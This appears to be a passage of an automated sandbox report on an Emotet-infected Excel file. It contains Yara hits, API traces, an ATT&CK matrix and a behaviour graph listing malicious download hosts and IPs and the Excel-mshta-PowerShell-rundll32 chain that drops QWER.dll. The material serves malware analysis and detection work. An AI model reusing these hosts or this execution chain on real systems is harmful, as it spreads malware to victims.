                            Source: Yara matchFile source: 80_513972285.xls, type: SAMPLE
                            Source: Yara matchFile source: C:\Users\user\Desktop\80_513972285.xls, type: DROPPED
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,9_2_1003F570
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetThreadLocale,GetLocaleInfoA,GetACP,9_2_10043730
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA,9_2_10014B71
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,11_2_1003F570
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetThreadLocale,GetLocaleInfoA,GetACP,11_2_10043730
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: _strcpy_s,__snprintf_s,GetLocaleInfoA,LoadLibraryA,11_2_10014B71
                            Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                            Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                            Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                            Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                            Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
                            Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformationJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003DAA7 cpuid 9_2_1003DAA7
                            Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003906D GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,9_2_1003906D
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_1003CE1A __lock,__invoke_watson,__invoke_watson,__invoke_watson,____lc_codepage_func,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson,9_2_1003CE1A
                            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_100453C8 GetVersion,GetVersion,GetVersion,GetVersion,GetVersion,RegisterClipboardFormatA,9_2_100453C8

                            Stealing of Sensitive Information

                            barindex
                            Yara detected Emotet
                            Source: Yara matchFile source: 17.2.rundll32.exe.330000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.28f0000.12.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2890000.9.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2810000.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2280000.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.3060000.13.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2340000.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2130000.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2860000.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.3e0000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2280000.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2170000.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.420000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.460000.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2100000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2830000.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.330000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.27a0000.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2e10000.12.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.27a0000.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.3150000.13.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.610000.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.23f0000.10.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2e00000.12.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2080000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.190000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2130000.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.28a0000.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.440000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.26d0000.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.6c0000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.31c0000.15.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.330000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.26b0000.7.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.190000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.380000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.630000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2840000.9.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.3190000.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2870000.10.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.430000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.28c0000.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.180000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.1c0000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2160000.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.4f0000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2740000.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.460000.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.27a0000.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2730000.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.rundll32.exe.340000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.4f0000.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2860000.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2340000.8.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.26d0000.4.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2950000.10.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.470000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2890000.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2810000.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.3030000.12.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.300000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.23c0000.9.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.4f0000.6.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.200000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.380000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.200000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2dc0000.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.4f0000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.28f0000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2950000.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2740000.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.23f0000.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.3030000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.260000.1.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.1a0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.4c0000.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.3160000.13.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2e10000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.660000.3.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2870000.10.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2080000.2.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.190000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2490000.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.630000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2730000.6.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.300000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 14.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.180000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2ed0000.13.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.27c0000.9.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2e00000.12.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.3190000.14.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.2890000.10.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.rundll32.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.rundll32.exe.1c0000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.2700000.5.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.2170000.4.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.2890000.11.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 11.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 16.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 15.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 9.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 17.2.rundll32.exe.10000000.16.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 10.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 12.2.rundll32.exe.10000000.14.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000011.00000002.672129305.0000000000460000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.565576249.0000000002841000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.614471421.0000000003061000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.510608388.0000000002ED1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.565412374.00000000026D0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.564937807.0000000000200000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.672206410.00000000004C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.672542934.00000000023C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.675105738.00000000031C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.509691983.0000000000380000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.672233162.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.671351696.0000000000180000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.614263255.0000000002891000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.671971939.00000000003E1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.514065714.00000000001A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.613086830.0000000000190000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.672276729.0000000000611000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.614545776.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.510373196.0000000002890000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.510260153.0000000002740000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.613891474.0000000002170000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.613342038.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.565506727.00000000027A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.567895594.0000000000300000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.675067684.0000000003190000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.614325624.0000000002950000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.614438771.0000000003030000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.510667014.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.565439888.0000000002701000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.510425143.00000000028C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.565551248.0000000002810000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.565698294.0000000002E10000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.510010458.0000000002130000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.509922920.0000000002080000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.514698978.0000000000471000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.510517753.0000000002E00000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.510176839.00000000026B1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.568150198.0000000000331000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.672589404.00000000023F0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.613442141.00000000006C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.675028637.0000000003161000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.613971338.0000000002491000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.565128790.0000000000661000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.565466027.0000000002730000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.614142809.00000000027A0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.674472849.0000000002891000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.672492274.0000000002340000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.614372731.0000000002DC1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.509833538.0000000000421000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.565096650.0000000000630000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.613198246.0000000000431000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.675215559.0000000010001000.00000020.00000001.01000000.0000000F.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.450462581.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.510060149.0000000002161000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.617473555.0000000000441000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.617627799.0000000010001000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.510140052.0000000002280000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.671797398.0000000000330000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.510293000.00000000027C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.564986915.0000000000261000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.565627998.00000000028A1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000A.00000002.509954832.0000000002101000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000010.00000002.616810767.0000000000190000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.674563401.00000000028F0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.614197032.0000000002831000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000E.00000002.568578862.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.565801844.0000000003151000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000009.00000002.450610382.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000011.00000002.671423407.00000000001C1000.00000020.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.565866582.0000000010001000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000F.00000002.614228489.0000000002860000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000B.00000002.514808197.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY
                            Source: Yara matchFile source: 0000000C.00000002.565599896.0000000002870000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: C:\ProgramData\QWER.dll, type: DROPPED

                            Mitre Att&ck Matrix

                            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                            Valid Accounts21
                            Scripting                            		1
                            Windows Service                            		1
                            Windows Service                            		1
                            Disable or Modify Tools                            		1
                            Input Capture                            		2
                            System Time Discovery                            		Remote Services1
                            Archive Collected Data                            		Exfiltration Over Other Network Medium13
                            Ingress Tool Transfer                            		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                            Default Accounts1
                            Native API                            		Boot or Logon Initialization Scripts11
                            Process Injection                            		1
                            Deobfuscate/Decode Files or Information                            		LSASS Memory3
                            File and Directory Discovery                            		Remote Desktop Protocol1
                            Email Collection                            		Exfiltration Over Bluetooth1
                            Encrypted Channel                            		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                            Domain Accounts13
                            Exploitation for Client Execution                            		Logon Script (Windows)Logon Script (Windows)21
                            Scripting                            		Security Account Manager38
                            System Information Discovery                            		SMB/Windows Admin Shares1
                            Input Capture                            		Automated Exfiltration2
                            Non-Application Layer Protocol                            		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                            Local Accounts11
                            Command and Scripting Interpreter                            		Logon Script (Mac)Logon Script (Mac)2
                            Obfuscated Files or Information                            		NTDS21
                            Security Software Discovery                            		Distributed Component Object Model1
                            Clipboard Data                            		Scheduled Transfer122
                            Application Layer Protocol                            		SIM Card SwapCarrier Billing Fraud
                            Cloud Accounts1
                            Service Execution                            		Network Logon ScriptNetwork Logon Script2
                            Masquerading                            		LSA Secrets1
                            Virtualization/Sandbox Evasion                            		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                            Replication Through Removable Media1
                            PowerShell                            		Rc.commonRc.common1
                            Virtualization/Sandbox Evasion                            		Cached Domain Credentials1
                            Process Discovery                            		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                            External Remote ServicesScheduled TaskStartup ItemsStartup Items11
                            Process Injection                            		DCSync1
                            Application Window Discovery                            		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
                            Hidden Files and Directories                            		Proc Filesystem1
                            Remote System Discovery                            		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                            Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
                            Rundll32                            		/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                            Behavior Graph

                            Hide Legend

                            Legend:

                            • Process
                            • Signature
                            • Created File
                            • DNS/IP Info
                            • Is Dropped
                            • Is Windows Process
                            • Number of created Registry Values
                            • Number of created Files
                            • Visual Basic
                            • Delphi
                            • Java
                            • .Net C# or VB.NET
                            • C, C++ or other language
                            • Is malicious
                            • Internet
                            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 562424 Sample: 80_513972285.xls Startdate: 28/01/2022 Architecture: WINDOWS Score: 100 49 210.57.209.142 UNAIR-AS-IDUniversitasAirlanggaID Indonesia 2->49 51 118.98.72.86 TELKOMNET-AS-APPTTelekomunikasiIndonesiaID Indonesia 2->51 53 31 other IPs or domains 2->53 63 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->63 65 Multi AV Scanner detection for domain / URL 2->65 67 Found malware configuration 2->67 69 17 other signatures 2->69 15 EXCEL.EXE 53 12 2->15         started        signatures3 process4 file5 47 C:\Users\user\Desktop\80_513972285.xls, Composite 15->47 dropped 18 cmd.exe 15->18         started        process6 process7 20 mshta.exe 11 18->20         started        dnsIp8 55 91.240.118.168, 49167, 49168, 80 GLOBALLAYERNL unknown 20->55 23 powershell.exe 12 7 20->23         started        process9 dnsIp10 57 kuyporn.com 172.67.149.209, 49169, 80 CLOUDFLARENETUS United States 23->57 59 jeffreylubin.igclout.com 74.208.236.157, 49170, 80 ONEANDONE-ASBrauerstrasse48DE United States 23->59 45 C:\ProgramData\QWER.dll, PE32 23->45 dropped 73 Powershell drops PE file 23->73 28 cmd.exe 23->28         started        file11 signatures12 process13 process14 30 rundll32.exe 28->30         started        process15 32 rundll32.exe 1 30->32         started        file16 43 C:\Windows\...\kcktqpyucuj.sda (copy), PE32 32->43 dropped 61 Hides that the sample has been downloaded from the Internet (zone.identifier) 32->61 36 rundll32.exe 32->36         started        signatures17 process18 process19 38 rundll32.exe 1 36->38         started        signatures20 71 Hides that the sample has been downloaded from the Internet (zone.identifier) 38->71 41 rundll32.exe 38->41         started        process21

                            Screenshots

                            Thumbnails

                            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                            windows-stand

                            Antivirus, Machine Learning and Genetic Malware Detection

                            Initial Sample

                            SourceDetectionScannerLabelLink
                            80_513972285.xls33%ReversingLabsDocument-Excel.Trojan.Emotet

                            Dropped Files

                            SourceDetectionScannerLabelLink
                            C:\ProgramData\QWER.dll100%Joe Sandbox ML

                            Unpacked PE Files

